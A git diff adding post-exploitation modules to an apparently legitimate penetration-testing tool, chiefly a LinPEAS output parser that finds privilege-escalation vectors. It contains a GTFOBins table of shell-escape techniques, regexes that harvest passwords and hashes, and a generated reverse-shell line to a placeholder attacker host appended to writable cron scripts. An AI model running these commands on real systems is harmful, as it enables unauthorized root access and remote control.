+        const cleanupResult = await generateCleanup(options)
+        results.push("[CLEANUP]")
+        results.push(cleanupResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[CLEANUP] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    // Complete session
+    const completed = await completeSession(options.sessionId, options.storage)
+
+    return { session: completed, summary: results.join("\n") }
+  }
+
+  /**
+   * Format all profiles for display.
+   */
+  export function formatProfiles(): string {
+    return PostExploitProfiles.formatTable()
+  }
+
+  /**
+   * List sessions.
+   */
+  export async function listSessions(
+    storage?: StorageConfig,
+    filters?: {
+      target?: string
+      platform?: PostExploitTypes.Platform
+      profile?: PostExploitTypes.ProfileId
+      status?: PostExploitTypes.Status
+      limit?: number
+    }
+  ): Promise<PostExploitTypes.PostExploitSession[]> {
+    return PostExploitStorage.listSessions(storage, filters)
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/parsers/index.ts b/packages/opencode/src/pentest/postexploit/parsers/index.ts
new file mode 100644
index 00000000000..685ce97b2e6
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/parsers/index.ts
@@ -0,0 +1,272 @@
+/**
+ * @fileoverview External Tool Parsers Module
+ *
+ * Exports for parsing LinPEAS, WinPEAS, and other external tool output.
+ *
+ * @module pentest/postexploit/parsers
+ */
+
+export { LinPEASParser } from "./linpeas"
+export { WinPEASParser } from "./winpeas"
+
+import { LinPEASParser } from "./linpeas"
+import { WinPEASParser } from "./winpeas"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified parsers interface.
+ */
+export namespace Parsers {
+  /**
+   * Supported parser types.
+   */
+  export type ParserType = "linpeas" | "winpeas"
+
+  /**
+   * Parser metadata.
+   */
+  export interface ParserInfo {
+    name: string
+    description: string
+    platform: PostExploitTypes.Platform
+    url: string
+    fileExtensions: string[]
+  }
+
+  /**
+   * Parser registry.
+   */
+  export const PARSERS: Record<ParserType, ParserInfo> = {
+    linpeas: {
+      name: "LinPEAS",
+      description: "Linux Privilege Escalation Awesome Script",
+      platform: "linux",
+      url: "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
+      fileExtensions: [".txt", ".log", ".out"],
+    },
+    winpeas: {
+      name: "WinPEAS",
+      description: "Windows Privilege Escalation Awesome Script",
+      platform: "windows",
+      url: "https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS",
+      fileExtensions: [".txt", ".log", ".out"],
+    },
+  }
+
+  /**
+   * Parse tool output based on type.
+   */
+  export function parse(
+    type: ParserType,
+    content: string
+  ): LinPEASParser.ParsedResult | WinPEASParser.ParsedResult {
+    switch (type) {
+      case "linpeas":
+        return LinPEASParser.parse(content)
+      case "winpeas":
+        return WinPEASParser.parse(content)
+      default:
+        throw new Error(`Unknown parser type: ${type}`)
+    }
+  }
+
+  /**
+   * Format parsed results based on type.
+   */
+  export function formatResults(
+    type: ParserType,
+    result: LinPEASParser.ParsedResult | WinPEASParser.ParsedResult
+  ): string {
+    switch (type) {
+      case "linpeas":
+        return LinPEASParser.formatResults(result as LinPEASParser.ParsedResult)
+      case "winpeas":
+        return WinPEASParser.formatResults(result as WinPEASParser.ParsedResult)
+      default:
+        throw new Error(`Unknown parser type: ${type}`)
+    }
+  }
+
+  /**
+   * Auto-detect parser type from content.
+   */
+  export function detectType(content: string): ParserType | null {
+    const lowerContent = content.toLowerCase()
+
+    // LinPEAS indicators
+    if (
+      lowerContent.includes("linpeas") ||
+      lowerContent.includes("linux privilege escalation") ||
+      (lowerContent.includes("/etc/passwd") && lowerContent.includes("suid"))
+    ) {
+      return "linpeas"
+    }
+
+    // WinPEAS indicators
+    if (
+      lowerContent.includes("winpeas") ||
+      lowerContent.includes("windows privilege escalation") ||
+      (lowerContent.includes("registry") && lowerContent.includes("services"))
+    ) {
+      return "winpeas"
+    }
+
+    // Platform-based heuristics
+    if (
+      lowerContent.includes("c:\\windows") ||
+      lowerContent.includes("hkey_") ||
+      lowerContent.includes(".exe")
+    ) {
+      return "winpeas"
+    }
+
+    if (
+      lowerContent.includes("/etc/") ||
+      lowerContent.includes("/var/") ||
+      lowerContent.includes("bash")
+    ) {
+      return "linpeas"
+    }
+
+    return null
+  }
+
+  /**
+   * Get parser info.
+   */
+  export function getParserInfo(type: ParserType): ParserInfo {
+    return PARSERS[type]
+  }
+
+  /**
+   * List available parsers.
+   */
+  export function listParsers(): ParserInfo[] {
+    return Object.values(PARSERS)
+  }
+
+  /**
+   * Extract privesc vectors from parsed results.
+   */
+  export function extractPrivescVectors(
+    type: ParserType,
+    result: LinPEASParser.ParsedResult | WinPEASParser.ParsedResult
+  ): Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] {
+    return result.privescVectors
+  }
+
+  /**
+   * Get quick reference for parsers.
+   */
+  export function getQuickReference(): string {
+    const lines: string[] = []
+    lines.push("EXTERNAL TOOL PARSERS")
+    lines.push("=====================")
+    lines.push("")
+    lines.push("Supported Tools:")
+    lines.push("")
+
+    for (const [type, info] of Object.entries(PARSERS)) {
+      lines.push(`  ${info.name} (${type})`)
+      lines.push(`    Platform: ${info.platform}`)
+      lines.push(`    URL: ${info.url}`)
+      lines.push("")
+    }
+
+    lines.push("Usage:")
+    lines.push("  1. Run LinPEAS/WinPEAS on target system")
+    lines.push("  2. Save output to a file")
+    lines.push("  3. Use postexploit parse tool=linpeas file=/path/to/output.txt")
+    lines.push("")
+    lines.push("Auto-Detection:")
+    lines.push("  The parser can auto-detect the tool type from content")
+    lines.push("  Use postexploit parse file=/path/to/output.txt (without tool=)")
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Strip ANSI color codes from content.
+   */
+  export function stripColors(content: string): string {
+    return content.replace(/\x1b\[[0-9;]*m/g, "")
+  }
+
+  /**
+   * Validate parser output content.
+   */
+  export function validateContent(content: string): {
+    valid: boolean
+    detectedType: ParserType | null
+    lineCount: number
+    hasColorCodes: boolean
+  } {
+    const hasColorCodes = /\x1b\[[0-9;]*m/.test(content)
+    const lineCount = content.split("\n").length
+    const detectedType = detectType(content)
+
+    return {
+      valid: lineCount > 10 && detectedType !== null,
+      detectedType,
+      lineCount,
+      hasColorCodes,
+    }
+  }
+
+  /**
+   * Get summary from parsed results.
+   */
+  export function getSummary(
+    result: LinPEASParser.ParsedResult | WinPEASParser.ParsedResult
+  ): {
+    totalFindings: number
+    criticalFindings: number
+    highFindings: number
+    mediumFindings: number
+    lowFindings: number
+    privescVectorCount: number
+  } {
+    return result.summary
+  }
+
+  /**
+   * Merge multiple parse results.
+   */
+  export function mergeResults(
+    results: Array<LinPEASParser.ParsedResult | WinPEASParser.ParsedResult>
+  ): {
+    totalFindings: number
+    criticalFindings: number
+    highFindings: number
+    mediumFindings: number
+    lowFindings: number
+    privescVectorCount: number
+    allVectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[]
+  } {
+    const allVectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] = []
+    let totalFindings = 0
+    let criticalFindings = 0
+    let highFindings = 0
+    let mediumFindings = 0
+    let lowFindings = 0
+
+    for (const result of results) {
+      allVectors.push(...result.privescVectors)
+      totalFindings += result.summary.totalFindings
+      criticalFindings += result.summary.criticalFindings
+      highFindings += result.summary.highFindings
+      mediumFindings += result.summary.mediumFindings
+      lowFindings += result.summary.lowFindings
+    }
+
+    return {
+      totalFindings,
+      criticalFindings,
+      highFindings,
+      mediumFindings,
+      lowFindings,
+      privescVectorCount: allVectors.length,
+      allVectors,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/parsers/linpeas.ts b/packages/opencode/src/pentest/postexploit/parsers/linpeas.ts
new file mode 100644
index 00000000000..f53d2efe199
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/parsers/linpeas.ts
@@ -0,0 +1,877 @@
+/**
+ * @fileoverview LinPEAS Output Parser
+ *
+ * Parses LinPEAS output to extract privilege escalation vectors,
+ * credentials, and other security findings.
+ *
+ * @module pentest/postexploit/parsers/linpeas
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * LinPEAS parser namespace.
+ */
+export namespace LinPEASParser {
+  /**
+   * LinPEAS section markers.
+   */
+  const SECTION_MARKERS = {
+    SYSTEM_INFO: /═+.*System Information.*═+/i,
+    CONTAINER: /═+.*Container.*═+/i,
+    NETWORK: /═+.*Network Information.*═+/i,
+    USERS: /═+.*Users Information.*═+/i,
+    SOFTWARE: /═+.*Software Information.*═+/i,
+    PROCESSES: /═+.*Processes.*═+/i,
+    CRON: /═+.*Cron.*═+/i,
+    SERVICES: /═+.*Services.*═+/i,
+    TIMERS: /═+.*Systemd.*timers.*═+/i,
+    SOCKETS: /═+.*Sockets.*═+/i,
+    SUID: /═+.*SUID.*═+/i,
+    CAPABILITIES: /═+.*Capabilities.*═+/i,
+    INTERESTING_FILES: /═+.*Interesting.*Files.*═+/i,
+    WRITABLE_FILES: /═+.*Writable.*═+/i,
+    PASSWORDS: /═+.*Passwords.*═+/i,
+    API_KEYS: /═+.*API.*Keys.*═+/i,
+  }
+
+  /**
+   * Color code patterns (ANSI escape sequences).
+   */
+  const COLOR_PATTERNS = {
+    RED_YELLOW: /\x1b\[1;31;103m/g,    // Critical findings
+    RED: /\x1b\[1;31m/g,                // High severity
+    YELLOW: /\x1b\[1;33m/g,             // Medium severity
+    GREEN: /\x1b\[1;32m/g,              // Low severity / info
+    CYAN: /\x1b\[1;36m/g,               // Section headers
+    BLUE: /\x1b\[1;34m/g,               // Subsections
+    RESET: /\x1b\[0m/g,                 // Reset
+    ALL: /\x1b\[[0-9;]*m/g,             // All ANSI codes
+  }
+
+  /**
+   * Known SUID binaries that can be exploited (GTFOBins reference).
+   */
+  const EXPLOITABLE_SUID: Record<string, { gtfobins: string; technique: string }> = {
+    nmap: { gtfobins: "https://gtfobins.github.io/gtfobins/nmap/", technique: "Interactive shell or script execution" },
+    vim: { gtfobins: "https://gtfobins.github.io/gtfobins/vim/", technique: "Shell escape via :!sh" },
+    vi: { gtfobins: "https://gtfobins.github.io/gtfobins/vi/", technique: "Shell escape via :!sh" },
+    nano: { gtfobins: "https://gtfobins.github.io/gtfobins/nano/", technique: "Shell escape via Ctrl+R Ctrl+X" },
+    less: { gtfobins: "https://gtfobins.github.io/gtfobins/less/", technique: "Shell escape via !sh" },
+    more: { gtfobins: "https://gtfobins.github.io/gtfobins/more/", technique: "Shell escape via !sh" },
+    find: { gtfobins: "https://gtfobins.github.io/gtfobins/find/", technique: "-exec /bin/sh \\;" },
+    awk: { gtfobins: "https://gtfobins.github.io/gtfobins/awk/", technique: "System command execution" },
+    perl: { gtfobins: "https://gtfobins.github.io/gtfobins/perl/", technique: "exec '/bin/sh'" },
+    python: { gtfobins: "https://gtfobins.github.io/gtfobins/python/", technique: "os.system('/bin/sh')" },
+    python3: { gtfobins: "https://gtfobins.github.io/gtfobins/python/", technique: "os.system('/bin/sh')" },
+    ruby: { gtfobins: "https://gtfobins.github.io/gtfobins/ruby/", technique: "exec '/bin/sh'" },
+    bash: { gtfobins: "https://gtfobins.github.io/gtfobins/bash/", technique: "bash -p" },
+    sh: { gtfobins: "https://gtfobins.github.io/gtfobins/sh/", technique: "Direct shell" },
+    dash: { gtfobins: "https://gtfobins.github.io/gtfobins/dash/", technique: "dash -p" },
+    zsh: { gtfobins: "https://gtfobins.github.io/gtfobins/zsh/", technique: "zsh" },
+    cp: { gtfobins: "https://gtfobins.github.io/gtfobins/cp/", technique: "File overwrite" },
+    mv: { gtfobins: "https://gtfobins.github.io/gtfobins/mv/", technique: "File overwrite" },
+    chmod: { gtfobins: "https://gtfobins.github.io/gtfobins/chmod/", technique: "Permission modification" },
+    chown: { gtfobins: "https://gtfobins.github.io/gtfobins/chown/", technique: "Ownership change" },
+    tar: { gtfobins: "https://gtfobins.github.io/gtfobins/tar/", technique: "--checkpoint-action" },
+    zip: { gtfobins: "https://gtfobins.github.io/gtfobins/zip/", technique: "-T -TT" },
+    rsync: { gtfobins: "https://gtfobins.github.io/gtfobins/rsync/", technique: "-e 'sh -c'" },
+    git: { gtfobins: "https://gtfobins.github.io/gtfobins/git/", technique: "Hooks or diff" },
+    env: { gtfobins: "https://gtfobins.github.io/gtfobins/env/", technique: "env /bin/sh" },
+    tee: { gtfobins: "https://gtfobins.github.io/gtfobins/tee/", technique: "File write" },
+    dd: { gtfobins: "https://gtfobins.github.io/gtfobins/dd/", technique: "File overwrite" },
+    xxd: { gtfobins: "https://gtfobins.github.io/gtfobins/xxd/", technique: "File write" },
+    base64: { gtfobins: "https://gtfobins.github.io/gtfobins/base64/", technique: "File read" },
+    openssl: { gtfobins: "https://gtfobins.github.io/gtfobins/openssl/", technique: "File read/write" },
+    curl: { gtfobins: "https://gtfobins.github.io/gtfobins/curl/", technique: "File upload/download" },
+    wget: { gtfobins: "https://gtfobins.github.io/gtfobins/wget/", technique: "File overwrite" },
+    nc: { gtfobins: "https://gtfobins.github.io/gtfobins/nc/", technique: "Reverse shell" },
+    netcat: { gtfobins: "https://gtfobins.github.io/gtfobins/nc/", technique: "Reverse shell" },
+    socat: { gtfobins: "https://gtfobins.github.io/gtfobins/socat/", technique: "Reverse shell" },
+    php: { gtfobins: "https://gtfobins.github.io/gtfobins/php/", technique: "system('/bin/sh')" },
+    node: { gtfobins: "https://gtfobins.github.io/gtfobins/node/", technique: "child_process.spawn" },
+    lua: { gtfobins: "https://gtfobins.github.io/gtfobins/lua/", technique: "os.execute('/bin/sh')" },
+    docker: { gtfobins: "https://gtfobins.github.io/gtfobins/docker/", technique: "Mount root filesystem" },
+    strace: { gtfobins: "https://gtfobins.github.io/gtfobins/strace/", technique: "-o flag file write" },
+    ltrace: { gtfobins: "https://gtfobins.github.io/gtfobins/ltrace/", technique: "-o flag file write" },
+    taskset: { gtfobins: "https://gtfobins.github.io/gtfobins/taskset/", technique: "Command execution" },
+    time: { gtfobins: "https://gtfobins.github.io/gtfobins/time/", technique: "Command execution" },
+    timeout: { gtfobins: "https://gtfobins.github.io/gtfobins/timeout/", technique: "Command execution" },
+    watch: { gtfobins: "https://gtfobins.github.io/gtfobins/watch/", technique: "-x flag" },
+    make: { gtfobins: "https://gtfobins.github.io/gtfobins/make/", technique: "-s flag" },
+    screen: { gtfobins: "https://gtfobins.github.io/gtfobins/screen/", technique: "Shell escape" },
+    tmux: { gtfobins: "https://gtfobins.github.io/gtfobins/tmux/", technique: "Shell escape" },
+    busybox: { gtfobins: "https://gtfobins.github.io/gtfobins/busybox/", technique: "Multiple methods" },
+  }
+
+  /**
+   * Parsed LinPEAS result structure.
+   */
+  export interface ParsedResult {
+    systemInfo: SystemInfo
+    suidBinaries: SUIDBinary[]
+    capabilities: CapabilityEntry[]
+    writableFiles: WritableFile[]
+    cronJobs: CronJob[]
+    passwords: PasswordFinding[]
+    sudoEntries: SudoEntry[]
+    interestingFiles: InterestingFile[]
+    networkInfo: NetworkInfo
+    containerInfo?: ContainerInfo
+    privescVectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[]
+    summary: ParseSummary
+  }
+
+  export interface SystemInfo {
+    hostname?: string
+    kernel?: string
+    distribution?: string
+    architecture?: string
+    users: string[]
+    sudoers: string[]
+  }
+
+  export interface SUIDBinary {
+    path: string
+    owner: string
+    permissions: string
+    exploitable: boolean
+    gtfobins?: string
+    technique?: string
+  }
+
+  export interface CapabilityEntry {
+    path: string
+    capabilities: string[]
+    exploitable: boolean
+  }
+
+  export interface WritableFile {
+    path: string
+    type: "file" | "directory"
+    owner: string
+    significance: "critical" | "high" | "medium" | "low"
+  }
+
+  export interface CronJob {
+    schedule: string
+    command: string
+    user: string
+    writable: boolean
+    path?: string
+  }
+
+  export interface PasswordFinding {
+    source: string
+    type: "cleartext" | "hash" | "config" | "history"
+    content: string
+    context?: string
+  }
+
+  export interface SudoEntry {
+    user: string
+    host: string
+    runas: string
+    commands: string
+    nopasswd: boolean
+    exploitable: boolean
+  }
+
+  export interface InterestingFile {
+    path: string
+    type: string
+    reason: string
+  }
+
+  export interface NetworkInfo {
+    interfaces: string[]
+    listeningPorts: { port: number; process: string }[]
+    connections: string[]
+  }
+
+  export interface ContainerInfo {
+    type: "docker" | "lxc" | "kubernetes" | "unknown"
+    privileged: boolean
+    escapeVectors: string[]
+  }
+
+  export interface ParseSummary {
+    totalFindings: number
+    criticalFindings: number
+    highFindings: number
+    mediumFindings: number
+    lowFindings: number
+    privescVectorCount: number
+  }
+
+  /**
+   * Strip ANSI color codes from text.
+   */
+  export function stripColors(text: string): string {
+    return text.replace(COLOR_PATTERNS.ALL, "")
+  }
+
+  /**
+   * Extract section content between markers.
+   */
+  function extractSection(content: string, startPattern: RegExp, endPattern?: RegExp): string {
+    const lines = content.split("\n")
+    let capturing = false
+    const sectionLines: string[] = []
+
+    for (const line of lines) {
+      if (startPattern.test(line)) {
+        capturing = true
+        continue
+      }
+
+      if (capturing) {
+        // Check if we hit another section header
+        if (/═{10,}/.test(line) && !startPattern.test(line)) {
+          break
+        }
+        sectionLines.push(line)
+      }
+    }
+
+    return sectionLines.join("\n")
+  }
+
+  /**
+   * Parse SUID binaries from LinPEAS output.
+   */
+  function parseSUIDBinaries(content: string): SUIDBinary[] {
+    const section = extractSection(content, SECTION_MARKERS.SUID)
+    const binaries: SUIDBinary[] = []
+
+    // Pattern: -rwsr-xr-x 1 root root 12345 date /path/to/binary
+    const suidPattern = /(-[rwxs-]{9,10})\s+\d+\s+(\w+)\s+\w+\s+\d+\s+\S+\s+\S+\s+(\S+)/g
+    let match
+
+    while ((match = suidPattern.exec(section)) !== null) {
+      const [, permissions, owner, path] = match
+      const binaryName = path.split("/").pop() || ""
+
+      const exploitInfo = EXPLOITABLE_SUID[binaryName]
+      binaries.push({
+        path,
+        owner,
+        permissions,
+        exploitable: !!exploitInfo,
+        gtfobins: exploitInfo?.gtfobins,
+        technique: exploitInfo?.technique,
+      })
+    }
+
+    // Also check for highlighted SUID binaries (marked with colors)
+    const highlightedPattern = /(?:99%|95%|PE).*?(\S+\/\S+)/gi
+    while ((match = highlightedPattern.exec(section)) !== null) {
+      const path = match[1]
+      const binaryName = path.split("/").pop() || ""
+      if (!binaries.find(b => b.path === path)) {
+        const exploitInfo = EXPLOITABLE_SUID[binaryName]
+        binaries.push({
+          path,
+          owner: "root",
+          permissions: "-rwsr-xr-x",
+          exploitable: !!exploitInfo,
+          gtfobins: exploitInfo?.gtfobins,
+          technique: exploitInfo?.technique,
+        })
+      }
+    }
+
+    return binaries
+  }
+
+  /**
+   * Parse capabilities from LinPEAS output.
+   */
+  function parseCapabilities(content: string): CapabilityEntry[] {
+    const section = extractSection(content, SECTION_MARKERS.CAPABILITIES)
+    const entries: CapabilityEntry[] = []
+
+    // Pattern: /path/to/binary = cap_xxx+ep
+    const capPattern = /(\S+)\s*=\s*([\w,+]+)/g
+    let match
+
+    const exploitableCapabilities = [
+      "cap_setuid",
+      "cap_setgid",
+      "cap_dac_override",
+      "cap_dac_read_search",
+      "cap_chown",
+      "cap_fowner",
+      "cap_sys_admin",
+      "cap_sys_ptrace",
+      "cap_net_admin",
+      "cap_net_raw",
+      "cap_sys_module",
+    ]
+
+    while ((match = capPattern.exec(section)) !== null) {
+      const [, path, caps] = match
+      const capabilities = caps.split(",").map(c => c.replace(/[+=].*/, "").trim())
+      const exploitable = capabilities.some(c =>
+        exploitableCapabilities.some(ec => c.toLowerCase().includes(ec))
+      )
+
+      entries.push({
+        path,
+        capabilities,
+        exploitable,
+      })
+    }
+
+    return entries
+  }
+
+  /**
+   * Parse sudo entries from LinPEAS output.
+   */
+  function parseSudoEntries(content: string): SudoEntry[] {
+    const entries: SudoEntry[] = []
+
+    // Look for sudo -l output or sudoers file content
+    const sudoPattern = /(\w+)\s+(\w+)=$(\w+(?::\w+)?)$\s*(NOPASSWD:\s*)?(.+)/g
+    let match
+
+    while ((match = sudoPattern.exec(content)) !== null) {
+      const [, user, host, runas, nopasswd, commands] = match
+      const exploitable = commands.includes("ALL") ||
+        Object.keys(EXPLOITABLE_SUID).some(bin => commands.includes(bin))
+
+      entries.push({
+        user,
+        host,
+        runas,
+        commands,
+        nopasswd: !!nopasswd,
+        exploitable,
+      })
+    }
+
+    return entries
+  }
+
+  /**
+   * Parse cron jobs from LinPEAS output.
+   */
+  function parseCronJobs(content: string): CronJob[] {
+    const section = extractSection(content, SECTION_MARKERS.CRON)
+    const jobs: CronJob[] = []
+
+    // Pattern: * * * * * user command or @reboot user command
+    const cronPattern = /([@\d\*\/,-]+\s+[@\d\*\/,-]+\s+[@\d\*\/,-]+\s+[@\d\*\/,-]+\s+[@\d\*\/,-]+|@\w+)\s+(\w+)\s+(.+)/g
+    let match
+
+    while ((match = cronPattern.exec(section)) !== null) {
+      const [, schedule, user, command] = match
+      const pathMatch = command.match(/(\S+\.sh|\S+\.py|\S+\.pl)/i)
+
+      jobs.push({
+        schedule,
+        command,
+        user,
+        writable: section.includes("writable") || section.includes("Writable"),
+        path: pathMatch?.[1],
+      })
+    }
+
+    return jobs
+  }
+
+  /**
+   * Parse password findings from LinPEAS output.
+   */
+  function parsePasswords(content: string): PasswordFinding[] {
+    const section = extractSection(content, SECTION_MARKERS.PASSWORDS)
+    const findings: PasswordFinding[] = []
+
+    // Look for various password patterns
+    const patterns = [
+      { regex: /password\s*[=:]\s*['"]?([^'";\s]+)/gi, type: "cleartext" as const },
+      { regex: /(\$[156]\$[a-zA-Z0-9./]+\$[a-zA-Z0-9./]+)/g, type: "hash" as const },
+      { regex: /passwd.*?:.*?:(\d+):(\d+):/g, type: "hash" as const },
+      { regex: /mysql.*?password.*?[=:]\s*(\S+)/gi, type: "config" as const },
+      { regex: /postgres.*?password.*?[=:]\s*(\S+)/gi, type: "config" as const },
+    ]
+
+    for (const { regex, type } of patterns) {
+      let match
+      while ((match = regex.exec(section)) !== null) {
+        findings.push({
+          source: "linpeas_passwords",
+          type,
+          content: match[1] || match[0],
+          context: match.input?.substring(Math.max(0, match.index - 20), match.index + match[0].length + 20),
+        })
+      }
+    }
+
+    // Also check history section
+    const historySection = extractSection(content, /History/i)
+    const historyPatterns = [
+      /mysql\s+-u\s*(\w+)\s+-p\s*(\S+)/gi,
+      /sshpass\s+-p\s*['"]?(\S+)/gi,
+      /curl.*?-u\s*(\w+):(\S+)/gi,
+    ]
+
+    for (const regex of historyPatterns) {
+      let match
+      while ((match = regex.exec(historySection)) !== null) {
+        findings.push({
+          source: "command_history",
+          type: "history",
+          content: match[0],
+          context: "Command history",
+        })
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Parse writable files from LinPEAS output.
+   */
+  function parseWritableFiles(content: string): WritableFile[] {
+    const section = extractSection(content, SECTION_MARKERS.WRITABLE_FILES)
+    const files: WritableFile[] = []
+
+    // Critical paths to watch for
+    const criticalPaths = [
+      "/etc/passwd", "/etc/shadow", "/etc/sudoers",
+      "/etc/crontab", "/etc/cron.d", "/etc/init.d",
+      "/etc/systemd/system", "/etc/profile", "/etc/bashrc",
+    ]
+
+    const highPaths = [
+      "/var/spool/cron", "/var/www", "/opt",
+      "/usr/local/bin", "/home",
+    ]
+
+    const lines = section.split("\n")
+    for (const line of lines) {
+      const pathMatch = line.match(/(\S+\/\S+)/)
+      if (pathMatch) {
+        const path = pathMatch[1]
+        const isDirectory = line.includes("drwx") || line.endsWith("/")
+
+        let significance: WritableFile["significance"] = "low"
+        if (criticalPaths.some(cp => path.startsWith(cp))) {
+          significance = "critical"
+        } else if (highPaths.some(hp => path.startsWith(hp))) {
+          significance = "high"
+        } else if (path.includes("cron") || path.includes("init") || path.includes("systemd")) {
+          significance = "high"
+        }
+
+        files.push({
+          path,
+          type: isDirectory ? "directory" : "file",
+          owner: "unknown",
+          significance,
+        })
+      }
+    }
+
+    return files
+  }
+
+  /**
+   * Parse system information from LinPEAS output.
+   */
+  function parseSystemInfo(content: string): SystemInfo {
+    const section = extractSection(content, SECTION_MARKERS.SYSTEM_INFO)
+
+    const hostnameMatch = section.match(/Hostname:\s*(\S+)/i)
+    const kernelMatch = section.match(/Linux version\s+(\S+)/i) || content.match(/(\d+\.\d+\.\d+-\S+)/i)
+    const distroMatch = section.match(/Distributor ID:\s*(\S+)/i) || section.match(/(Ubuntu|Debian|CentOS|RedHat|Fedora|Arch)/i)
+    const archMatch = section.match(/(x86_64|i386|arm64|aarch64)/i)
+
+    // Parse users
+    const users: string[] = []
+    const userPattern = /uid=\d+$(\w+)$/g
+    let match
+    while ((match = userPattern.exec(content)) !== null) {
+      if (!users.includes(match[1])) {
+        users.push(match[1])
+      }
+    }
+
+    // Parse sudoers
+    const sudoers: string[] = []
+    const sudoerPattern = /(\w+)\s+ALL=\(/g
+    while ((match = sudoerPattern.exec(content)) !== null) {
+      if (!sudoers.includes(match[1])) {
+        sudoers.push(match[1])
+      }
+    }
+
+    return {
+      hostname: hostnameMatch?.[1],
+      kernel: kernelMatch?.[1],
+      distribution: distroMatch?.[1],
+      architecture: archMatch?.[1],
+      users,
+      sudoers,
+    }
+  }
+
+  /**
+   * Parse network information from LinPEAS output.
+   */
+  function parseNetworkInfo(content: string): NetworkInfo {
+    const section = extractSection(content, SECTION_MARKERS.NETWORK)
+
+    const interfaces: string[] = []
+    const ifacePattern = /(\w+):\s+<.*?>/g
+    let match
+    while ((match = ifacePattern.exec(section)) !== null) {
+      interfaces.push(match[1])
+    }
+
+    const listeningPorts: { port: number; process: string }[] = []
+    const portPattern = /(?:LISTEN|0\.0\.0\.0):(\d+).*?(\S+)/g
+    while ((match = portPattern.exec(section)) !== null) {
+      listeningPorts.push({
+        port: parseInt(match[1], 10),
+        process: match[2],
+      })
+    }
+
+    return {
+      interfaces,
+      listeningPorts,
+      connections: [],
+    }
+  }
+
+  /**
+   * Parse container information from LinPEAS output.
+   */
+  function parseContainerInfo(content: string): ContainerInfo | undefined {
+    const section = extractSection(content, SECTION_MARKERS.CONTAINER)
+    if (!section || section.trim().length === 0) {
+      return undefined
+    }
+
+    let type: ContainerInfo["type"] = "unknown"
+    if (section.includes("docker") || section.includes("/.dockerenv")) {
+      type = "docker"
+    } else if (section.includes("lxc")) {
+      type = "lxc"
+    } else if (section.includes("kubernetes") || section.includes("/var/run/secrets/kubernetes")) {
+      type = "kubernetes"
+    }
+
+    const privileged = section.toLowerCase().includes("privileged") ||
+      section.includes("cap_sys_admin")
+
+    const escapeVectors: string[] = []
+    if (privileged) {
+      escapeVectors.push("Privileged container - mount host filesystem")
+    }
+    if (section.includes("docker.sock")) {
+      escapeVectors.push("Docker socket mounted - create privileged container")
+    }
+    if (section.includes("cap_sys_admin")) {
+      escapeVectors.push("CAP_SYS_ADMIN - cgroup escape possible")
+    }
+
+    return {
+      type,
+      privileged,
+      escapeVectors,
+    }
+  }
+
+  /**
+   * Convert findings to privesc vectors.
+   */
+  function generatePrivescVectors(
+    suidBinaries: SUIDBinary[],
+    capabilities: CapabilityEntry[],
+    sudoEntries: SudoEntry[],
+    cronJobs: CronJob[],
+    writableFiles: WritableFile[],
+    containerInfo?: ContainerInfo
+  ): Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] {
+    const vectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] = []
+
+    // SUID vectors
+    for (const suid of suidBinaries.filter(s => s.exploitable)) {
+      vectors.push({
+        category: "suid",
+        platform: "linux",
+        name: `SUID ${suid.path.split("/").pop()}`,
+        description: `Exploitable SUID binary: ${suid.path}`,
+        risk: "high",
+        exploitability: "easy",
+        target: suid.path,
+        technique: suid.technique || "Shell escape",
+        commands: [`# See GTFOBins: ${suid.gtfobins}`],
+        prerequisites: [],
+        detectionRisk: "medium",
+        gtfobins: suid.gtfobins,
+        mitre: [PostExploitTypes.MITRE_PRIVESC.SETUID_SETGID],
+      })
+    }
+
+    // Capability vectors
+    for (const cap of capabilities.filter(c => c.exploitable)) {
+      vectors.push({
+        category: "capabilities",
+        platform: "linux",
+        name: `Capabilities on ${cap.path.split("/").pop()}`,
+        description: `Exploitable capabilities: ${cap.capabilities.join(", ")}`,
+        risk: "high",
+        exploitability: "moderate",
+        target: cap.path,
+        technique: "Capability abuse",
+        commands: [`getcap ${cap.path}`, `# Exploit based on capabilities`],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.ABUSE_ELEVATION],
+      })
+    }
+
+    // Sudo vectors
+    for (const sudo of sudoEntries.filter(s => s.exploitable)) {
+      vectors.push({
+        category: "sudo",
+        platform: "linux",
+        name: `Sudo ${sudo.commands.substring(0, 30)}...`,
+        description: `Sudo permission: ${sudo.user} can run ${sudo.commands} as ${sudo.runas}`,
+        risk: sudo.nopasswd ? "critical" : "high",
+        exploitability: sudo.nopasswd ? "trivial" : "easy",
+        target: sudo.commands,
+        technique: "Sudo abuse",
+        commands: [`sudo -u ${sudo.runas} ${sudo.commands}`],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.SUDO_CACHING],
+      })
+    }
+
+    // Cron vectors
+    for (const cron of cronJobs.filter(c => c.writable)) {
+      vectors.push({
+        category: "cron",
+        platform: "linux",
+        name: `Writable cron job`,
+        description: `Writable cron job running as ${cron.user}: ${cron.command}`,
+        risk: cron.user === "root" ? "critical" : "high",
+        exploitability: "easy",
+        target: cron.path || cron.command,
+        technique: "Cron job hijacking",
+        commands: [
+          `# Edit the writable script to include payload`,
+          `echo '/bin/bash -i >& /dev/tcp/ATTACKER/PORT 0>&1' >> ${cron.path}`,
+        ],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.SCHEDULED_TASK],
+      })
+    }
+
+    // Writable file vectors
+    for (const file of writableFiles.filter(f => f.significance === "critical")) {
